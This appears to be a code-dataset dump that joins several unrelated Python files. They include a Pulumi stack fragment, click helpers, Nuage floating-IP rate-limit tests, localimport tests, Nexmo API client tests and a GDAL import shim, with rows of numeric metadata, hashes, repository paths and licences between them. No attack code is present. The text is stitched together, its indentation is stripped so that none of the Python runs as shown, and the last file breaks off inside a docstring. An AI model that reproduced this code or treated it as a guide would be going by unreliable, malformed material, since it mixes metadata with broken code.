__props__["stack_endpoint"] = stack_endpoint
__props__["tags"] = tags
__props__["use_custom_cookbooks"] = use_custom_cookbooks
__props__["use_opsworks_security_groups"] = use_opsworks_security_groups
__props__["vpc_id"] = vpc_id
return Stack(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 58.473333
| 616
| 0.702485
| 2,293
| 17,542
| 5.101614
| 0.096816
| 0.052659
| 0.055052
| 0.055223
| 0.842281
| 0.82356
| 0.813301
| 0.801419
| 0.772012
| 0.75842
| 0
| 0.00073
| 0.219587
| 17,542
| 299
| 617
| 58.668896
| 0.853762
| 0.413465
| 0
| 0.017241
| 1
| 0
| 0.165116
| 0.059504
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0.008621
| 0.051724
| 0.017241
| 0.327586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31afcef7b61a4db598678181d80bd2561859086b
| 265
|
py
|
Python
|
lightning_transformers/core/__init__.py
|
maksym-taranukhin/lightning-transformers
|
aa7202657973b5b65c3c36eb745621043859ebc4
|
[
"Apache-2.0"
] | 451
|
2021-04-21T15:53:59.000Z
|
2022-03-29T10:39:45.000Z
|
lightning_transformers/core/__init__.py
|
mathemusician/lightning-transformers
|
b2ef06113433e6a178ce4d3c9df7ede8064e247f
|
[
"Apache-2.0"
] | 92
|
2021-04-21T18:42:58.000Z
|
2022-03-30T05:29:54.000Z
|
lightning_transformers/core/__init__.py
|
mathemusician/lightning-transformers
|
b2ef06113433e6a178ce4d3c9df7ede8064e247f
|
[
"Apache-2.0"
] | 51
|
2021-04-22T05:35:28.000Z
|
2022-03-17T13:08:12.000Z
|
from lightning_transformers.core.data import TransformerDataModule # noqa: F401
from lightning_transformers.core.finetuning import TransformersBaseFinetuning # noqa: F401
from lightning_transformers.core.model import LitTransformer, TaskTransformer # noqa: F401
| 66.25
| 91
| 0.856604
| 28
| 265
| 8
| 0.5
| 0.174107
| 0.334821
| 0.388393
| 0.330357
| 0.330357
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 0.09434
| 265
| 3
| 92
| 88.333333
| 0.895833
| 0.120755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31c83d0e8d37614436272b1e59ab628bb5a816fc
| 131
|
py
|
Python
|
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | 3
|
2022-01-05T09:13:10.000Z
|
2022-01-06T15:08:37.000Z
|
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | null | null | null |
openrobot_cli/utils.py
|
OpenRobot-Packages/OpenRobot-CLI
|
57574cd2cafc6619d8fec77d083b79a11260846d
|
[
"MIT"
] | 2
|
2022-01-09T05:02:57.000Z
|
2022-01-23T08:40:24.000Z
|
import click
def blue_text(text):
return click.style(text, fg="blue")
def error(text):
return click.style(text, fg="red")
| 18.714286
| 39
| 0.687023
| 21
| 131
| 4.238095
| 0.47619
| 0.224719
| 0.337079
| 0.449438
| 0.58427
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 7
| 40
| 18.714286
| 0.809091
| 0
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7309f5aa1a55b59db43e3ba7e22efd93e510e100
| 9,476
|
py
|
Python
|
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2021-01-03T01:47:51.000Z
|
2021-01-03T01:47:51.000Z
|
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | null | null | null |
nuage_tempest_plugin/tests/api/floating_ip/test_nuage_bidirectional_fip_rate_limit.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2020-10-16T12:04:39.000Z
|
2020-10-16T12:04:39.000Z
|
# Copyright 2015 Alcatel-Lucent
# All Rights Reserved.
from tempest.test import decorators
from nuage_tempest_plugin.lib.test import nuage_test
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.lib.utils import constants
from . import base_nuage_bidirectional_fip_rate_limit
LOG = Topology.get_logger(__name__)
class TestNuageBidirectionalFipRateLimit(
base_nuage_bidirectional_fip_rate_limit.
NuageBidirectionalFipRateLimitBase):
"""TestNuageBidirectionalFipRateLimit
Tests per FIP rate limiting using the neutron REST client
Create a Floating IP
Update a Floating IP
List all Floating IPs
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
public_network_id which is the id for the external network present
"""
@classmethod
def resource_setup(cls):
super(TestNuageBidirectionalFipRateLimit, cls).resource_setup()
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000, 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 5000, 10000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 4000, 2000)
self._show_fip_with_fip_rate_limit(self.ports[0], fip, 4000, 2000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0], '0', '0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.MAX_INT,
constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0], 100000, 900000)
# @nuage_test.header()
# this test case will be moved to negative cases for this feature
# message': u'Bad request: nuage_ingress_fip_rate_kbps value cannot be
# in fraction'
# def test_create_floatingip_with_rate_limit_fractional_value(self):
# self._create_fip_with_fip_rate_limit(self.ports[0], 0.5, 0.5)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.UNLIMITED,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 0, 0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.UNLIMITED,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_maximal_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.MAX_INT,
constants.MAX_INT)
def test_update_floatingip_with_rate_limit_high_value(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000, 5000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
100000, 100000)
@nuage_test.header()
def test_list_floatingip_does_not_show_rate_limit_value(self):
def get_attr(_dict, _key):
return _dict[_key]
fip1 = self._create_fip_with_fip_rate_limit(self.ports[0], 10)
fip2 = self._create_fip_with_fip_rate_limit(self.ports[1], 20)
body = self.floating_ips_client.list_floatingips()
fip_list = body['floatingips']
# Floating ips are in the list
self.assertIn(fip1['id'],
[fip['id'] for fip in fip_list])
self.assertIn(fip2['id'],
[fip['id'] for fip in fip_list])
get_fips = [_fip for _fip in fip_list if _fip['id'] == fip1['id']]
self.assertRaises(KeyError, get_attr, get_fips[0], 'nuage_fip_rate')
# ONLY INGRESS DIRECTION TESTS
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 5000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 4000)
self._show_fip_with_fip_rate_limit(self.ports[0], fip, 4000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], '0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0], 100000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value_ingress(self):
self._create_fip_with_fip_rate_limit(self.ports[0],
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 2000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip,
constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_high_value_ingress(self):
fip = self._create_fip_with_fip_rate_limit(self.ports[0], 3000)
self._update_fip_with_fip_rate_limit(self.ports[0], fip, 100000)
# ONLY EGRESS DIRECTION TESTS
@decorators.attr(type='smoke')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_normal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=2000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=5000)
@nuage_test.header()
def test_show_floatingip_with_rate_limit_normal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=4000)
self._show_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=4000)
@nuage_test.header()
# OPENSTACK-1583
def test_create_floatingip_with_rate_limit_minimal_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit='0')
@nuage_test.header()
def test_create_floatingip_with_rate_limit_maximal_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=constants.MAX_INT)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_high_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=100000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_unlimited_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_minimal_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=2000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=0)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_unlimited_value_egress(self):
fip = self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=3000)
self._update_fip_with_fip_rate_limit(
self.ports[0], fip, egress_rate_limit=constants.UNLIMITED)
@nuage_test.header()
def test_update_floatingip_with_rate_limit_high_value_egress(self):
self._create_fip_with_fip_rate_limit(
self.ports[0], egress_rate_limit=3000)
@nuage_test.header()
def test_create_floatingip_with_rate_limit_backward(self):
self._create_fip_with_fip_rate_limit_backward(
self.ports[0], rate_limit=3000)
| 41.929204
| 78
| 0.703356
| 1,301
| 9,476
| 4.637971
| 0.108378
| 0.140206
| 0.097448
| 0.109049
| 0.813391
| 0.798475
| 0.779085
| 0.771959
| 0.759198
| 0.746271
| 0
| 0.034117
| 0.214331
| 9,476
| 225
| 79
| 42.115556
| 0.77636
| 0.091283
| 0
| 0.477419
| 0
| 0
| 0.006543
| 0
| 0
| 0
| 0
| 0
| 0.019355
| 1
| 0.206452
| false
| 0
| 0.032258
| 0.006452
| 0.251613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b45db79ba520d28993599f35a1977b358b36b493
| 40
|
py
|
Python
|
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
handlers/__init__.py
|
shishyando/random-choice-bot
|
dc0f923d2394f581365736b050a2c00f56055f1e
|
[
"Apache-2.0"
] | null | null | null |
from . import inline
from . import user
| 13.333333
| 20
| 0.75
| 6
| 40
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 21
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f203c90325878ce6f57dd701c1c3c5b51a3865e
| 42
|
py
|
Python
|
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/llama3-weboftomorrow-com
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | 1
|
2018-08-26T19:41:28.000Z
|
2018-08-26T19:41:28.000Z
|
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/cookiecutter-website
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/api/api/__init__.py
|
jkenlooper/cookiecutter-website
|
a62fcccd0c3b1627dd596229b4f752f4ef49c295
|
[
"MIT"
] | null | null | null |
"API for {{ cookiecutter.project_name }}"
| 21
| 41
| 0.714286
| 5
| 42
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 1
| 42
| 42
| 0.783784
| 0.928571
| 0
| 0
| 0
| 0
| 0.928571
| 0.595238
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48d03128a19361313783669076ec4c090ad262f3
| 1,885
|
py
|
Python
|
tests/test_localimport.py
|
OutHereVR/py-localimport
|
69af71c37f8bd3b2121ec39083dff18a9a2d04a1
|
[
"MIT"
] | 29
|
2017-03-10T18:00:11.000Z
|
2021-02-22T22:56:36.000Z
|
tests/test_localimport.py
|
OutHereVR/py-localimport
|
69af71c37f8bd3b2121ec39083dff18a9a2d04a1
|
[
"MIT"
] | 17
|
2017-04-26T14:13:49.000Z
|
2018-07-07T21:37:35.000Z
|
lib/py-localimport/tests/test_localimport.py
|
NiklasRosenstein/c4ddocs
|
9be4efba47d0dbd5787622933b21fdcf8fb5272e
|
[
"MIT"
] | 5
|
2017-07-21T22:24:15.000Z
|
2020-08-17T05:51:19.000Z
|
from nose.tools import *
from localimport import localimport
import os
import sys
modules_dir = os.path.join(os.path.dirname(__file__), 'modules')
def test_localimport_with_autodisable():
sys.path.append(modules_dir)
import another_module as mod_a
try:
with localimport('modules') as _imp:
import some_module
import another_module as mod_b
assert 'some_module' in sys.modules
assert sys.modules['another_module'] is mod_b
assert 'some_module' not in sys.modules
assert sys.modules['another_module'] is mod_a
assert mod_a is not mod_b
finally:
sys.path.remove(modules_dir)
del sys.modules['another_module']
def test_localimport_without_autodisable():
sys.path.append(modules_dir)
import another_module as mod_a
try:
with localimport('modules', do_autodisable=False) as _imp:
import some_module
import another_module as mod_b
assert 'some_module' in sys.modules
assert sys.modules['another_module'] is mod_b
assert mod_a is mod_b
assert 'some_module' not in sys.modules
assert sys.modules['another_module'] is mod_a
finally:
sys.path.remove(modules_dir)
del sys.modules['another_module']
def test_localimpot_parent_dir():
with localimport('.', parent_dir=modules_dir) as _imp:
import some_module
assert 'some_module' not in sys.modules
assert 'another_module' not in sys.modules
def test_localimpot_curdir():
with localimport('.') as _imp:
import some_module
assert 'some_module' not in sys.modules
assert 'another_module' not in sys.modules
def test_discover():
with localimport('.') as _imp:
assert_equals(sorted(x.name for x in _imp.discover()), ['another_module', 'some_module', 'test_localimport'])
with localimport('modules') as _imp:
assert_equals(sorted(x.name for x in _imp.discover()), ['another_module', 'some_module'])
| 29.920635
| 113
| 0.73634
| 277
| 1,885
| 4.747292
| 0.166065
| 0.114068
| 0.073004
| 0.082129
| 0.760456
| 0.743726
| 0.743726
| 0.743726
| 0.743726
| 0.743726
| 0
| 0
| 0.170822
| 1,885
| 62
| 114
| 30.403226
| 0.841331
| 0
| 0
| 0.68
| 0
| 0
| 0.145966
| 0
| 0
| 0
| 0
| 0
| 0.32
| 1
| 0.1
| false
| 0
| 0.42
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b133e818c077a4d942304c2aacb38870c28f3a7
| 122
|
py
|
Python
|
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | 1
|
2021-08-13T08:55:54.000Z
|
2021-08-13T08:55:54.000Z
|
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | null | null | null |
tkitMarker/model/__init__.py
|
napoler/Bert-BiLSTM-CRF-pytorch
|
2768cfe59a90d45de487cd6efb364fe8c9749582
|
[
"MIT"
] | 2
|
2020-09-22T01:07:51.000Z
|
2021-08-13T08:55:51.000Z
|
# coding=utf-8
from .crf import CRF
from .bert_lstm_crf import BERT_LSTM_CRF
from .albert_lstm_crf import ALBERT_LSTM_CRF
| 24.4
| 44
| 0.836066
| 23
| 122
| 4.086957
| 0.391304
| 0.297872
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.114754
| 122
| 4
| 45
| 30.5
| 0.861111
| 0.098361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b1bda83166ab141804909c5fadada0c2969f1ff
| 167
|
py
|
Python
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplic-systems/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 3
|
2018-02-24T03:58:59.000Z
|
2020-02-12T06:56:56.000Z
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplic-systems/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 1
|
2015-12-23T22:54:56.000Z
|
2016-02-04T21:23:29.000Z
|
src/Samples/Sample.ImportResolver/Math/MathImpl/__init__.py
|
simplicbe/Simplic.Dlr
|
614bca70cb2916cd85e34c6bb0b0cc56ce390e50
|
[
"MIT"
] | 1
|
2018-02-19T02:41:11.000Z
|
2018-02-19T02:41:11.000Z
|
# Sample math package
print ('Begin import /Math/MathImpl/__init__.py')
import MathImpl
print ('End import /Math/MathImpl/__init__.py: ' + str(MathImpl.add(1, 2)))
| 41.75
| 75
| 0.724551
| 25
| 167
| 4.56
| 0.6
| 0.175439
| 0.315789
| 0.385965
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013605
| 0.11976
| 167
| 4
| 75
| 41.75
| 0.755102
| 0.113772
| 0
| 0
| 0
| 0
| 0.545455
| 0.370629
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
d2ddb6b8f431a24ae8776f0ed9993bcb49b97050
| 3,475
|
py
|
Python
|
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
tests/test_misc.py
|
harunpehlivan/nexmo-python
|
b102d4c619b41503fa9ff1274489adbe320fdfab
|
[
"MIT"
] | null | null | null |
from util import *
@responses.activate
def test_get(client, dummy_data):
stub(responses.GET, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.get(host, request_uri, params=params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_query()
assert "bbb=yyy" in request_query()
@responses.activate
def test_get_with_auth(client, dummy_data):
stub(responses.GET, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.get(host, request_uri, params=params, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_query()
assert "bbb=yyy" in request_query()
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
@responses.activate
def test_post(client, dummy_data):
stub(responses.POST, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.post(host, request_uri, params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_body()
assert "bbb=yyy" in request_body()
@responses.activate
def test_post_with_auth(client, dummy_data):
stub(responses.POST, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.post(host, request_uri, params, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "aaa=xxx" in request_body()
assert "bbb=yyy" in request_body()
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
@responses.activate
def test_put(client, dummy_data):
stub(responses.PUT, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
params = {"aaa": "xxx", "bbb": "yyy"}
response = client.put(host, request_uri, params=params)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert b"aaa" in request_body()
assert b"xxx" in request_body()
assert b"bbb" in request_body()
assert b"yyy" in request_body()
@responses.activate
def test_delete(client, dummy_data):
stub(responses.DELETE, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
response = client.delete(host, request_uri)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
@responses.activate
def test_delete_with_auth(client, dummy_data):
stub(responses.DELETE, "https://api.nexmo.com/v1/applications")
host = "api.nexmo.com"
request_uri = "/v1/applications"
response = client.delete(host, request_uri, header_auth=True)
assert isinstance(response, dict)
assert request_user_agent() == dummy_data.user_agent
assert "Authorization" in request_headers()
assert request_headers()["Authorization"].startswith("Basic")
| 36.578947
| 77
| 0.705612
| 457
| 3,475
| 5.183807
| 0.102845
| 0.056986
| 0.065006
| 0.070916
| 0.987336
| 0.907556
| 0.907556
| 0.897425
| 0.870409
| 0.870409
| 0
| 0.004775
| 0.156259
| 3,475
| 94
| 78
| 36.968085
| 0.803206
| 0
| 0
| 0.75
| 0
| 0
| 0.196547
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.0875
| false
| 0
| 0.0125
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2e113a58eac27c871105482f97790139040d27f
| 128
|
py
|
Python
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 13
|
2015-11-18T18:26:34.000Z
|
2021-05-09T13:59:46.000Z
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 7
|
2021-06-04T23:45:15.000Z
|
2022-03-12T00:44:14.000Z
|
swig/python/gdal.py
|
VisualAwarenessTech/gdal-2.2.1
|
5ea1c6671d6f0f3b93e9e9bf2a71da618c834e8d
|
[
"Apache-2.0"
] | 6
|
2019-02-03T14:19:32.000Z
|
2021-12-19T06:36:49.000Z
|
# import osgeo.gdal as a convenience
from osgeo.gdal import deprecation_warn
deprecation_warn('gdal')
from osgeo.gdal import *
| 21.333333
| 39
| 0.804688
| 19
| 128
| 5.315789
| 0.473684
| 0.267327
| 0.257426
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 128
| 5
| 40
| 25.6
| 0.901786
| 0.265625
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d2f44979d95f3f05ceeaf987e88d75423636710c
| 5,186
|
py
|
Python
|
explore_australia/endpoints.py
|
Cipahi/explore_australia
|
0080b8e1c8cd33d568b71915c598780e91a99b0b
|
[
"MIT"
] | 36
|
2019-03-05T06:51:40.000Z
|
2022-01-29T14:07:13.000Z
|
explore_australia/endpoints.py
|
khornlund/explore_australia
|
713fd714727ae7ff60eb033806c5180fdad1277f
|
[
"MIT"
] | 2
|
2019-03-08T12:40:03.000Z
|
2020-05-22T03:15:30.000Z
|
explore_australia/endpoints.py
|
khornlund/explore_australia
|
713fd714727ae7ff60eb033806c5180fdad1277f
|
[
"MIT"
] | 41
|
2019-03-05T02:27:11.000Z
|
2021-12-25T03:53:52.000Z
|
""" file: endpoints.py (explore_australia)
author: Jess Robertson, @jesserobertson
date: Tuesday, 05 March 2019
description: Endpoint locations for geophysical coverages on NCI
